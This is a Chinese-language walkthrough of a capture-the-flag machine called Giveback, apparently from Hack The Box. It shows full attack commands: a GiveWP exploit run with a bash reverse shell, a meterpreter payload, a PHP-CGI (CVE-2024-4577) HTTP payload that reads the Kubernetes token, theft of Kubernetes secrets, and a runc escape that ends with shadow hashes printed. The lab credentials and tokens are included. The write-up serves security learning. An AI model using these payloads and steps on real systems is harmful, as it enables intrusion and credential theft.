[Season9] Giveback WP

User Flag

nmap 扫描到三个端口，80 是一个 wordpress，30686 看着像一个 k8s 的服务

PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    syn-ack ttl 62 nginx 1.28.0
|_http-favicon: Unknown favicon MD5: 000BF649CC8F6BF27CFB04D1BCDCD3C7
|_http-generator: WordPress 6.8.1
| http-methods: 
|_  Supported Methods: GET HEAD POST
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: nginx/1.28.0
|_http-title: GIVING BACK IS WHAT MATTERS MOST – OBVI
30686/tcp open  unknown syn-ack ttl 63
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Load-Balancing-Endpoint-Weight: 1
|     Date: Mon, 03 Nov 2025 15:28:06 GMT
|     Content-Length: 127
|     "service": {
|     "namespace": "default",
|     "name": "wp-nginx-service"
|     "localEndpoints": 1,
|     "serviceProxyHealthy": true
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest, HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Load-Balancing-Endpoint-Weight: 1
|     Date: Mon, 03 Nov 2025 15:27:36 GMT
|     Content-Length: 127
|     "service": {
|     "namespace": "default",
|     "name": "wp-nginx-service"
|     "localEndpoints": 1,
|_    "serviceProxyHealthy": true

wpscan 扫描到存在插件 give 版本为 3.14.0

[+] give
 | Location: http://localhost/wp-content/plugins/give/
 | Last Updated: 2025-10-29T20:17:00.000Z
 | [!] The version is out of date, the latest version is 4.12.0
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By:
 |  Urls In 404 Page (Passive Detection)
 |  Meta Tag (Passive Detection)
 |  Javascript Var (Passive Detection)
 |
 | Version: 3.14.0 (100% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - http://localhost/wp-content/plugins/give/assets/dist/css/give.css?ver=3.14.0
 | Confirmed By:
 |  Meta Tag (Passive Detection)
 |   - http://localhost/, Match: 'Give v3.14.0'
 |  Javascript Var (Passive Detection)
 |   - http://localhost/, Match: '"1","give_version":"3.14.0","magnific_options"'

搜索得到受 CVE-2024-5932 影响

使用 EQSTLab/CVE-2024-8353: GiveWP PHP Object Injection exploit

uv run CVE-2024-8353.py -u http://10.129.127.118/donations/the-things-we-need/ -c 'bash -c "/bin/bash -i >& /dev/tcp/10.10.16.25/443 0>&1"'

wp-config.php

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'bitnami_wordpress' );

/** Database username */
define( 'DB_USER', 'bn_wordpress' );

/** Database password */
define( 'DB_PASSWORD', 'sW5sp4spa3u7RLyetrekE4oS' );

/** Database hostname */
define( 'DB_HOST', 'beta-vino-wp-mariadb:3306' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'G7T{pv:!LZWUfekgP{A8TGFoL0,dMEU,&2B)ALoZS[8lo8V~+UGj@kWW%n^.vZgx' );
define( 'SECURE_AUTH_KEY',  'F3!hvuWAWvZw^$^|L]ONjyS{*xPHr(j,2$)!@t.(ZEn9NPNQ!A*6o6l}8@IN)>?>' );
define( 'LOGGED_IN_KEY',    'E5x5$T@Ggpti3+!/0G<>j<ylElF+}#Ny-7XZLw<#j[6|:oel9%OgxG|U}86./&&K' );
define( 'NONCE_KEY',        'jM^E^Bx{vf-Ca~2$eXbH%RzD?=VmxWP9Z}-}J1E@N]t`GOP`8;<F;lYmGz8sh7sG' );
define( 'AUTH_SALT',        '+L>`[0~bk-bRDX 5F?ER)PUnB_ ZWSId=J {5XV:trSTp0u!~6shvPS`VP{f(@_Q' );
define( 'SECURE_AUTH_SALT', 'RdhA5mNy%0~H%~s~S]a,G~;=n|)+~hZ/JWy*$GP%sAB-f>.;rcsO6.HXPvw@2q,]' );
define( 'LOGGED_IN_SALT',   'i?aJHLYu/rI%@MWZTw%Ch~%h|M/^Wum4$#4;qm(#zgQA+X3gKU?~B)@Mbgy %k}G' );
define( 'NONCE_SALT',       'Y!dylf@|OTpnNI+fC~yFTq@<}$rN)^>=+e}Q~*ez?1dnb8kF8@_{QFy^n;)gk&#q' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



define( 'FS_METHOD', 'direct' );
/**
 * The WP_SITEURL and WP_HOME options are configured to access from any hostname or IP address.
 * If you want to access only from an specific domain, you can modify them. For example:
 *  define('WP_HOME','http://example.com');
 *  define('WP_SITEURL','http://example.com');
 *
 */
if ( defined( 'WP_CLI' ) ) {
        $_SERVER['HTTP_HOST'] = '127.0.0.1';
}

define( 'WP_HOME', 'http://' . $_SERVER['HTTP_HOST'] . '/' );
define( 'WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST'] . '/' );
define( 'WP_AUTO_UPDATE_CORE', false );
/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

/**
 * Disable pingback.ping xmlrpc method to prevent WordPress from participating in DDoS attacks
 * More info at: https://docs.bitnami.com/general/apps/wordpress/troubleshooting/xmlrpc-and-pingback/ */
if ( !defined( 'WP_CLI' ) ) {
        // remove x-pingback HTTP header
        add_filter("wp_headers", function($headers) {
                unset($headers["X-Pingback"]);
                return $headers;
        });
        // disable pingbacks
        add_filter( "xmlrpc_methods", function( $methods ) {
                unset( $methods["pingback.ping"] );
                return $methods;
        });
}

从数据库中导出用户凭证

mysql -u bn_wordpress -p'sW5sp4spa3u7RLyetrekE4oS' -h beta-vino-wp-mariadb -D bitnami_wordpress -e "SELECT user_login, user_pass FROM wp_users;"

得到

user_login      user_pass
user    $P$Bm1D6gJHKylnyyTeT0oYNGKpib//vP.

env 中得到

LEGACY_INTRANET_SERVICE_PORT=tcp://10.43.2.241:5000

用 Msf 开个代理

msfvenom -p linux/x64/meterpreter_reverse_tcp  LHOST=10.10.16.102 LPORT=4444 -f elf -o met

上传

php -r "copy('http://10.10.16.102:8000/met', 'met');"

meterpreter > portfwd add -l 5000 -p 5000 -r 10.43.2.241

访问 10.43.2.241:5000 发现有

/cgi-bin/php-cgi — PHP-CGI Handler


### Developer Note

This CMS was originally deployed on Windows IIS using `php-cgi.exe`. During migration to Linux, the Windows-style CGI handling was retained to ensure legacy scripts continued to function without modification.

php 版本 X-Powered-By: PHP/8.3.3 且提示说是从 windows 迁移过来的，判断受 CVE-2024-4577 影响

这台机子估计出不了网，于是直接使用 webshell 枚举了，发现用户为 root

payload

POST /cgi-bin/php-cgi?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: 0.0.0.0:5000
Content-Length: 3
Pragma: no-cache
Cache-Control: no-cache
Origin: http://0.0.0.0:5000
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: keep-alive

cat${IFS}/var/run/secrets/kubernetes.io/serviceaccount/token

拿到 k8s service account token

eyJhbGciOiJSUzI1NiIsImtpZCI6Inp3THEyYUhkb19sV3VBcGFfdTBQa1c1S041TkNiRXpYRS11S0JqMlJYWjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiLCJrM3MiXSwiZXhwIjoxNzkzOTc5ODA4LCJpYXQiOjE3NjI0NDM4MDgsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiYWYzOTRlZGMtZjA1Mi00Yzc1LTgzYTUtNmFkMDFhNDBlOTkxIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0Iiwibm9kZSI6eyJuYW1lIjoiZ2l2ZWJhY2suaHRiIiwidWlkIjoiMTJhOGE5Y2YtYzM1Yi00MWYzLWIzNWEtNDJjMjYyZTQzMDQ2In0sInBvZCI6eyJuYW1lIjoibGVnYWN5LWludHJhbmV0LWNtcy02ZjdiZjVkYjg0LWxmdzdsIiwidWlkIjoiMzM3ODUxY2QtYTM2NS00NmU2LTk4MDAtZTJhYzdlMWUyZmIyIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJzZWNyZXQtcmVhZGVyLXNhIiwidWlkIjoiNzJjM2YwYTUtOWIwOC00MzhhLWEzMDctYjYwODc0NjM1YTlhIn0sIndhcm5hZnRlciI6MTc2MjQ0NzQxNX0sIm5iZiI6MTc2MjQ0MzgwOCwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6c2VjcmV0LXJlYWRlci1zYSJ9.1wI6pBKmcZGUVsMQlRya988Y5yj0H_elwIy-bow3bAldYdYURUZo3dCrfXY9KQ7qy1f2d6jmqMF6VgERaI6csKcUmg7c_Uho5anrRZ6cWYzZ9IV0oJ9aywiscpGMk-F8NeGI3Zqz5H8_QeZGVb8pAou4SOfHyIP479Mj4aOymbUHTfhdFxs93J2Bl7B4eVVS6RF8jYTvIYPsXhfqtxAsZpxpziNG3_KsTEV19CO1O0wQ9vQUmUyCbSHj24Q_KmTHKMgZHImtp7OPbj1AynILr8wlKpyouANtC_EWyf6w9rsi-5Qs30ZJYruNr7pa07FvmYoR-awHxuJBpsSVVSNN8w

使用 kubectl 枚举信息

KUBERNETES_SERVICE_PORT=443
KUBERNETES_SERVICE_HOST=10.43.0.1

meterpreter > portfwd add -l 5443 -p 443 -r 10.43.0.1

export K8S_APISERVER="https://0.0.0.0:5443"
export SA_TOKEN="eyJhbGciOiJSUzI1NiIsImtpZCI6Inp3THEyYUhkb19sV3VBcGFfdTBQa1c1S041TkNiRXpYRS11S0JqMlJYWjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiLCJrM3MiXSwiZXhwIjoxNzkzOTc5ODA4LCJpYXQiOjE3NjI0NDM4MDgsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiYWYzOTRlZGMtZjA1Mi00Yzc1LTgzYTUtNmFkMDFhNDBlOTkxIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0Iiwibm9kZSI6eyJuYW1lIjoiZ2l2ZWJhY2suaHRiIiwidWlkIjoiMTJhOGE5Y2YtYzM1Yi00MWYzLWIzNWEtNDJjMjYyZTQzMDQ2In0sInBvZCI6eyJuYW1lIjoibGVnYWN5LWludHJhbmV0LWNtcy02ZjdiZjVkYjg0LWxmdzdsIiwidWlkIjoiMzM3ODUxY2QtYTM2NS00NmU2LTk4MDAtZTJhYzdlMWUyZmIyIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJzZWNyZXQtcmVhZGVyLXNhIiwidWlkIjoiNzJjM2YwYTUtOWIwOC00MzhhLWEzMDctYjYwODc0NjM1YTlhIn0sIndhcm5hZnRlciI6MTc2MjQ0NzQxNX0sIm5iZiI6MTc2MjQ0MzgwOCwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6c2VjcmV0LXJlYWRlci1zYSJ9.1wI6pBKmcZGUVsMQlRya988Y5yj0H_elwIy-bow3bAldYdYURUZo3dCrfXY9KQ7qy1f2d6jmqMF6VgERaI6csKcUmg7c_Uho5anrRZ6cWYzZ9IV0oJ9aywiscpGMk-F8NeGI3Zqz5H8_QeZGVb8pAou4SOfHyIP479Mj4aOymbUHTfhdFxs93J2Bl7B4eVVS6RF8jYTvIYPsXhfqtxAsZpxpziNG3_KsTEV19CO1O0wQ9vQUmUyCbSHj24Q_KmTHKMgZHImtp7OPbj1AynILr8wlKpyouANtC_EWyf6w9rsi-5Qs30ZJYruNr7pa07FvmYoR-awHxuJBpsSVVSNN8w"

./kubectl --server="$K8S_APISERVER" --token="$SA_TOKEN" --insecure-skip-tls-verify=true auth can-i --list

Resources                                       Non-Resource URLs                      Resource Names   Verbs
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
secrets                                         []                                     []               [get list]
                                                [/.well-known/openid-configuration/]   []               [get]
                                                [/.well-known/openid-configuration]    []               [get]
                                                [/api/*]                               []               [get]
                                                [/api]                                 []               [get]
                                                [/apis/*]                              []               [get]
                                                [/apis]                                []               [get]
                                                [/healthz]                             []               [get]
                                                [/healthz]                             []               [get]
                                                [/livez]                               []               [get]
                                                [/livez]                               []               [get]
                                                [/openapi/*]                           []               [get]
                                                [/openapi]                             []               [get]
                                                [/openid/v1/jwks/]                     []               [get]
                                                [/openid/v1/jwks]                      []               [get]
                                                [/readyz]                              []               [get]
                                                [/readyz]                              []               [get]
                                                [/version/]                            []               [get]
                                                [/version/]                            []               [get]
                                                [/version]                             []               [get]
                                                [/version]                             []               [get]

可以看到有 [get list] secrets 的权限

./kubectl --server="$K8S_APISERVER" --token="$SA_TOKEN" --insecure-skip-tls-verify=true get secrets -n default
NAME                                  TYPE                 DATA   AGE
beta-vino-wp-mariadb                  Opaque               2      410d
beta-vino-wp-wordpress                Opaque               1      410d
sh.helm.release.v1.beta-vino-wp.v58   helm.sh/release.v1   1      68d
sh.helm.release.v1.beta-vino-wp.v59   helm.sh/release.v1   1      68d
sh.helm.release.v1.beta-vino-wp.v60   helm.sh/release.v1   1      67d
sh.helm.release.v1.beta-vino-wp.v61   helm.sh/release.v1   1      67d
sh.helm.release.v1.beta-vino-wp.v62   helm.sh/release.v1   1      67d
sh.helm.release.v1.beta-vino-wp.v63   helm.sh/release.v1   1      67d
sh.helm.release.v1.beta-vino-wp.v64   helm.sh/release.v1   1      67d
sh.helm.release.v1.beta-vino-wp.v65   helm.sh/release.v1   1      67d
sh.helm.release.v1.beta-vino-wp.v66   helm.sh/release.v1   1      42d
sh.helm.release.v1.beta-vino-wp.v67   helm.sh/release.v1   1      42d
user-secret-babywyrm                  Opaque               1      6h49m
user-secret-margotrobbie              Opaque               1      6h49m
user-secret-sydneysweeney             Opaque               1      6h49m


./kubectl --server="$K8S_APISERVER" --token="$SA_TOKEN" --insecure-skip-tls-verify=true get secret beta-vino-wp-mariadb beta-vino-wp-wordpress user-secret-babywyrm user-secret-margotrobbie user-secret-sydneysweeney -n default -o json
{
    "apiVersion": "v1",
    "items": [
        {
            "apiVersion": "v1",
            "data": {
                "mariadb-password": "c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T",
                "mariadb-root-password": "c1c1c3A0c3lldHJlMzI4MjgzODNrRTRvUw=="
            },
            "kind": "Secret",
            "metadata": {
                "annotations": {
                    "meta.helm.sh/release-name": "beta-vino-wp",
                    "meta.helm.sh/release-namespace": "default"
                },
                "creationTimestamp": "2024-09-21T22:17:31Z",
                "labels": {
                    "app.kubernetes.io/instance": "beta-vino-wp",
                    "app.kubernetes.io/managed-by": "Helm",
                    "app.kubernetes.io/name": "mariadb",
                    "app.kubernetes.io/part-of": "mariadb",
                    "app.kubernetes.io/version": "11.8.2",
                    "helm.sh/chart": "mariadb-21.0.0"
                },
                "name": "beta-vino-wp-mariadb",
                "namespace": "default",
                "resourceVersion": "2088227",
                "uid": "3473d5ec-b774-40c9-a249-81d51426a45e"
            },
            "type": "Opaque"
        },
        {
            "apiVersion": "v1",
            "data": {
                "wordpress-password": "TzhGN0tSNXpHaQ=="
            },
            "kind": "Secret",
            "metadata": {
                "annotations": {
                    "meta.helm.sh/release-name": "beta-vino-wp",
                    "meta.helm.sh/release-namespace": "default"
                },
                "creationTimestamp": "2024-09-21T22:17:31Z",
                "labels": {
                    "app.kubernetes.io/instance": "beta-vino-wp",
                    "app.kubernetes.io/managed-by": "Helm",
                    "app.kubernetes.io/name": "wordpress",
                    "app.kubernetes.io/version": "6.8.2",
                    "helm.sh/chart": "wordpress-25.0.5"
                },
                "name": "beta-vino-wp-wordpress",
                "namespace": "default",
                "resourceVersion": "2088228",
                "uid": "1cbbc5ac-1611-46af-8033-09e98dfc546b"
            },
            "type": "Opaque"
        },
        {
            "apiVersion": "v1",
            "data": {
                "MASTERPASS": "ZmU0TlEwdFNyOUVWNDlaSG9sYzdGa1ZRQ1gxVDZw"
            },
            "kind": "Secret",
            "metadata": {
                "creationTimestamp": "2025-11-06T10:02:13Z",
                "name": "user-secret-babywyrm",
                "namespace": "default",
                "ownerReferences": [
                    {
                        "apiVersion": "bitnami.com/v1alpha1",
                        "controller": true,
                        "kind": "SealedSecret",
                        "name": "user-secret-babywyrm",
                        "uid": "7a955a65-f599-4bdd-9b0e-0a9d77d76fa3"
                    }
                ],
                "resourceVersion": "2855769",
                "uid": "138833db-17d3-4687-85cd-e08c86f071a0"
            },
            "type": "Opaque"
        },
        {
            "apiVersion": "v1",
            "data": {
                "USER_PASSWORD": "d2NRZXpFcVZpdlUwNWV3akZPRU4zUEVKV1drbGMzUQ=="
            },
            "kind": "Secret",
            "metadata": {
                "creationTimestamp": "2025-11-06T10:02:23Z",
                "name": "user-secret-margotrobbie",
                "namespace": "default",
                "ownerReferences": [
                    {
                        "apiVersion": "bitnami.com/v1alpha1",
                        "controller": true,
                        "kind": "SealedSecret",
                        "name": "user-secret-margotrobbie",
                        "uid": "0565b4c6-fdfd-4e35-8044-b3cd402e8d53"
                    }
                ],
                "resourceVersion": "2855829",
                "uid": "227f71e6-93d8-493d-989c-5a6885c290a0"
            },
            "type": "Opaque"
        },
        {
            "apiVersion": "v1",
            "data": {
                "USER_PASSWORD": "c3U0WExLSnV6Mkh0QnBNTk1rajFlTUF1aVFvYXR5WHU="
            },
            "kind": "Secret",
            "metadata": {
                "creationTimestamp": "2025-11-06T10:02:19Z",
                "name": "user-secret-sydneysweeney",
                "namespace": "default",
                "ownerReferences": [
                    {
                        "apiVersion": "bitnami.com/v1alpha1",
                        "controller": true,
                        "kind": "SealedSecret",
                        "name": "user-secret-sydneysweeney",
                        "uid": "4110f80b-e845-4574-b1f7-f9039c7333ca"
                    }
                ],
                "resourceVersion": "2855816",
                "uid": "ee7f04fe-39e7-4fa9-bf0c-4381efb49119"
            },
            "type": "Opaque"
        }
    ],
    "kind": "List",
    "metadata": {
        "resourceVersion": ""
    }
}

使用 ssh 登录 babywyrm:fe4NQ0tSr9EV49ZHolc7FkVQCX1T6p

在 /home/babywyrm/ 找到 user.txt

Root Flag

babywyrm@giveback:~$ sudo -l
Matching Defaults entries for babywyrm on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty, timestamp_timeout=0, timestamp_timeout=20

User babywyrm may run the following commands on localhost:
    (ALL) NOPASSWD: !ALL
    (ALL) /opt/debug

使用 base64 的 mariadb-password 作为 administrative password 即 c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T

babywyrm@giveback:~$ sudo /opt/debug --help
Validating sudo...
Please enter the administrative password: 

Both passwords verified. Executing the command...
NAME:
   runc - Open Container Initiative runtime

runc is a command line client for running applications packaged according to
the Open Container Initiative (OCI) format and is a compliant implementation of the
Open Container Initiative specification.

runc integrates well with existing process supervisors to provide a production
container runtime environment for applications. It can be used with your
existing process monitoring tools and the container will be spawned as a
direct child of the process supervisor.

Containers are configured using bundles. A bundle for a container is a directory
that includes a specification file named "config.json" and a root filesystem.
The root filesystem contains the contents of the container.

To start a new instance of a container:

    # runc run [ -b bundle ] <container-id>

Where "<container-id>" is your name for the instance of the container that you
are starting. The name you provide for the container instance must be unique on
your host. Providing the bundle directory using "-b" is optional. The default
value for "bundle" is the current directory.

USAGE:
   runc.amd64.debug [global options] command [command options] [arguments...]

VERSION:
   1.1.11
commit: v1.1.11-0-g4bccb38c
spec: 1.0.2-dev
go: go1.20.12
libseccomp: 2.5.4

COMMANDS:
   checkpoint  checkpoint a running container
   create      create a container
   delete      delete any resources held by the container often used with detached container
   events      display container events such as OOM notifications, cpu, memory, and IO usage statistics
   exec        execute new process inside the container
   kill        kill sends the specified signal (default: SIGTERM) to the container's init process
   list        lists containers started by runc with the given root
   pause       pause suspends all processes inside the container
   ps          ps displays the processes running inside a container
   restore     restore a container from a previous checkpoint
   resume      resumes all processes that have been previously paused
   run         create and run a container
   spec        create a new specification file
   start       executes the user defined process in a created container
   state       output the state of a container
   update      update container resource constraints
   features    show the enabled features
   help, h     Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --debug             enable debug logging
   --log value         set the log file to write runc logs to (default is '/dev/stderr')
   --log-format value  set the log format ('text' (default), or 'json') (default: "text")
   --root value        root directory for storage of container state (this should be located in tmpfs) (default: "/run/runc")
   --criu value        path to the criu binary used for checkpoint and restore (default: "criu")
   --systemd-cgroup    enable systemd cgroup support, expects cgroupsPath to be of form "slice:prefix:name" for e.g. "system.slice:runc:434234"
   --rootless value    ignore cgroup permission errors ('true', 'false', or 'auto') (default: "auto")   --help, -h          show help
   --version, -v       print the version

这是个 runc 是一个容器运行时，考虑到把主机的文件系统挂载进容器

创建 config.json

{
    "ociVersion": "1.0.2",
    "process": {
        "user": {"uid": 0, "gid": 0},
        "args": ["/bin/bash"],
        "cwd": "/",
        "env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],
        "terminal": false
    },
    "root": {"path": "rootfs"},
    "mounts": [
        {"destination": "/proc", "type": "proc", "source": "proc"},
        {"destination": "/bin", "type": "bind", "source": "/bin", "options": ["bind","ro"]},
        {"destination": "/lib", "type": "bind", "source": "/lib", "options": ["bind","ro"]},
        {"destination": "/lib64", "type": "bind", "source": "/lib64", "options": ["bind","ro"]},
        {"destination": "/root", "type": "bind", "source": "/root", "options": ["bind","ro"]},
        {"destination": "/etc", "type": "bind", "source": "/etc", "options": ["bind","ro"]}
    ],
    "linux": {"namespaces": [{"type": "mount"}]}
}

运行 runc

babywyrm@giveback:/tmp/runc$ sudo /opt/debug run aaa
Validating sudo...
Please enter the administrative password: 

Both passwords verified. Executing the command...
id
uid=0(root) gid=0(root) groups=0(root)

Hash

root:$y$j9T$QFzc3gsorLqusBf73kX1x.$jyvD/pCPnr99xNLW62eqJVCQT5IbN7seZdPI3YoLgCA:20361:0:99999:7:::
daemon:*:19977:0:99999:7:::
bin:*:19977:0:99999:7:::
sys:*:19977:0:99999:7:::
sync:*:19977:0:99999:7:::
games:*:19977:0:99999:7:::
man:*:19977:0:99999:7:::
lp:*:19977:0:99999:7:::
mail:*:19977:0:99999:7:::
news:*:19977:0:99999:7:::
uucp:*:19977:0:99999:7:::
proxy:*:19977:0:99999:7:::
www-data:*:19977:0:99999:7:::
backup:*:19977:0:99999:7:::
list:*:19977:0:99999:7:::
irc:*:19977:0:99999:7:::
gnats:*:19977:0:99999:7:::
nobody:*:19977:0:99999:7:::
_apt:*:19977:0:99999:7:::
systemd-network:*:19977:0:99999:7:::
systemd-resolve:*:19977:0:99999:7:::
messagebus:*:19977:0:99999:7:::
systemd-timesync:*:19977:0:99999:7:::
pollinate:*:19977:0:99999:7:::
usbmux:*:19987:0:99999:7:::
sshd:*:19987:0:99999:7:::
babywyrm:$y$j9T$iXuCIsxdKlm04iCANMsoy1$ocXHJTxMHMc5nh3rKCUuk4D3q/OVBs/HV/yJ0pqKR86:20400:0:99999:7:::_laurel:!:20363::::::